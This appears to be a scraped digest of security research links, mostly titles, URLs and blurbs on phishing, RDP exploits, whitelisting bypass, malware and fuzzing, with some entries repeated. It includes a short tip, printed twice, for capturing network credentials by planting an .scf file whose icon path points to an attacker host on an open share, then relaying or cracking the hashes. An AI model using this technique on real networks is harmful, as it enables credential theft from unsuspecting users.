Obfuscation Techniques used in Phishing Attacks - redteamsec
https://www.reddit.com/r/redteamsec/comments/ampngj/obfuscation_techniques_used_in_phishing_attacks/
https://www.reddit.com/r/redteamsec/comments/ampngj/obfuscation_techniques_used_in_phishing_attacks/
reddit
r/redteamsec - Obfuscation Techniques used in Phishing Attacks
9 votes and 0 comments so far on Reddit
Tribe of Hackers: Free PDF Version - Threatcare
https://www.threatcare.com/tribe-of-hackers-free-pdf/
https://www.threatcare.com/tribe-of-hackers-free-pdf/
Threatcare
Tribe of Hackers Free PDF - Threatcare
Get the Tribe of Hackers Free PDF from this page by signing up with your email adress. Tribe of Hackers contains insights from 70 industry professionals.
Need creds on a local network? Found an open network share?
1) Create an scf file with the following:
[Shell] Command=2 IconFile=\\X.X.X.X\share\test.ico
[Taskbar] Command=ToggleDesktop
2) Upload to the share.
3) Run your capture tool or relay creds.
4) Wait, crack hash, enjoy
1) Create an scf file with the following:
[Shell] Command=2 IconFile=\\X.X.X.X\share\test.ico
[Taskbar] Command=ToggleDesktop
2) Upload to the share.
3) Run your capture tool or relay creds.
4) Wait, crack hash, enjoy
Automation In Red Teaming – Red Teaming with a Blue Team Mentaility – Medium
https://medium.com/red-teaming-with-a-blue-team-mentaility/automation-in-red-teaming-32363e3a50d
https://medium.com/red-teaming-with-a-blue-team-mentaility/automation-in-red-teaming-32363e3a50d
Medium
Automation In Red Teaming
The offensive security community is advancing rapidly. With platforms such as Twitter along with several widely used blogging sites…
Mass Cracking Cybrary Accounts – Somdev Sangwan
https://s0md3v.github.io/mass-cracking-cybrary-accounts/
https://s0md3v.github.io/mass-cracking-cybrary-accounts/
Reverse RDP Attack: Code Execution on RDP Clients - Check Point Research
https://research.checkpoint.com/reverse-rdp-attack-code-execution-on-rdp-clients/
https://research.checkpoint.com/reverse-rdp-attack-code-execution-on-rdp-clients/
Check Point Research
Reverse RDP Attack: Code Execution on RDP Clients - Check Point Research
Research by: Eyal Itkin Overview Used by thousands of IT professionals and security researchers worldwide, the Remote Desktop Protocol (RDP) is usually considered a safe and trustworthy application to connect to remote computers. Whether it is used to help…
Phishing Campaigns are Manipulating the Windows Control Panel Extension to Deliver Banking Trojans - Cofense
https://cofense.com/phishing-campaigns-manipulating-windows-control-panel-extension-deliver-banking-trojans/
https://cofense.com/phishing-campaigns-manipulating-windows-control-panel-extension-deliver-banking-trojans/
Cofense
Phishing Campaigns are Manipulating the Windows Control Panel Extension to Deliver Banking Trojans - Cofense
By Aaron Riley and Marcel Feller CISO Summary Recently, CofenseTM has seen phishing campaigns that bypass email security using a .cpl file extension attachment. .CPL is the file name extension for items or icons appearing in the Windows Control Panel. These…
Notes on fuzzing ImageMagick and GraphicsMagick - The Blagoblag
https://alexgaynor.net/2019/feb/05/notes-fuzzing-imagemagick-graphicsmagick/
https://alexgaynor.net/2019/feb/05/notes-fuzzing-imagemagick-graphicsmagick/
Bypass Application Whitelisting using Weak Path Rule
https://www.hackingarticles.in/bypass-application-whitelisting-using-weak-path-rule/
https://www.hackingarticles.in/bypass-application-whitelisting-using-weak-path-rule/
Hacking Articles
Bypass Application Whitelisting using Weak Path Rule
Learn how to bypass application whitelisting security by exploiting weak path rules in Windows environments for penetration testing.
Qealler – a new JAR-based information stealer | Zscaler Blog
https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer
https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer
Zscaler
Qealler – a new JAR-based information stealer
Zscaler ThreatLabZ has observed a rise in the malware's activity, which was detected in the Zscaler Cloud Sandbox. "Qealler" a new piece of malware, is written in Java and designed to silently steal credentials in infected machines. Read more.
Clever Phishing Attack Enlists Google Translate to Spoof Login Page | Threatpost | The first stop for security news
https://threatpost.com/clever-phishing-attack-enlists-google-translate-to-spoof-facebook-login-page/141571/
https://threatpost.com/clever-phishing-attack-enlists-google-translate-to-spoof-facebook-login-page/141571/
Threat Post
Clever Phishing Attack Enlists Google Translate to Spoof Login Page
A tricky two-stage phishing scam is targeting Facebook and Google credentials using a landing page that hides behind Google's translate feature.
[PoC] [CVE-2018-18354] Chrome remote code execution attack chain
Ignore Sandbox , Ignore Applock , Ignore download restriction
combined 3 bugs into logical vulnerability attack chain
https://t.co/IUWnx1mgZM
Ignore Sandbox , Ignore Applock , Ignore download restriction
combined 3 bugs into logical vulnerability attack chain
https://t.co/IUWnx1mgZM
How Android Q improves privacy and permission controls over Android Pie
https://www.xda-developers.com/android-q-privacy-permission-controls/
https://www.xda-developers.com/android-q-privacy-permission-controls/
XDA Developers
How Android Q improves Privacy and Permission Controls over Android Pie
Android Q will bring a revamp to permission management and enhancements to protect user privacy. Here's what Google has changed since Android Pie.
ClusterFuzz, an infrastructure used for fuzzing Chrome and OSS-Fuzz, is open source now! Enjoy responsibly :)
Blog: https://t.co/v6ywgccmRH
Code: https://t.co/lO9ACd7FY8
Blog: https://t.co/v6ywgccmRH
Code: https://t.co/lO9ACd7FY8
Google Open Source Blog
Open sourcing ClusterFuzz
The latest news from Google on open source releases, major projects, events, and student outreach programs.
Remote Code Execution via Path Traversal in the Device Metadata Authoring Wizard
https://posts.specterops.io/remote-code-execution-via-path-traversal-in-the-device-metadata-authoring-wizard-a0d5839fc54f
https://posts.specterops.io/remote-code-execution-via-path-traversal-in-the-device-metadata-authoring-wizard-a0d5839fc54f
Medium
Remote Code Execution via Path Traversal in the Device Metadata Authoring Wizard
Attackers can use the .devicemanifest-ms and .devicemetadata-ms file extensions for phishing if the Windows Driver Kit is installed.
DnsCache. reference example for how to call the Windows API to enumerate cached DNS records in the Windows resolver
https://t.co/YDhPvp9LKU
https://t.co/YDhPvp9LKU
Discovering and Exploiting a Vulnerability in Android’s Personal Dictionary (CVE-2018-9375) | IOActive
https://ioactive.com/discovering-and-exploiting-a-vulnerability-in-androids-personal-dictionary/
https://ioactive.com/discovering-and-exploiting-a-vulnerability-in-androids-personal-dictionary/
Frida 12.3 Debuts New Crash Reporting Feature - NowSecure
https://www.nowsecure.com/blog/2019/02/07/frida-12-3-debuts-new-crash-reporting-feature/
https://www.nowsecure.com/blog/2019/02/07/frida-12-3-debuts-new-crash-reporting-feature/
NowSecure
Frida 12.3 Debuts New Crash Reporting Feature
The Frida 12.3 open-source software dynamic instrumentation toolkit offers an exciting new app crash reporting feature that provides more details about... #Frida #OpenSourceTools #ProductUpdates
A guide to HTTP security headers for better web browser security | Detectify Blog
https://blog.detectify.com/2019/02/05/guide-http-security-headers-for-better-web-browser-security/
https://blog.detectify.com/2019/02/05/guide-http-security-headers-for-better-web-browser-security/
Detectify Blog
A guide to HTTP security headers for better web browser security - Detectify Blog
A guide on different response HTTP-headers that a web server can include in a request in order to prevent XSS attacks, protecting the web browser user.
Evil Twin Attack - The Definitive Guide (Updated 2019)
https://rootsh3ll.com/evil-twin-attack/
https://rootsh3ll.com/evil-twin-attack/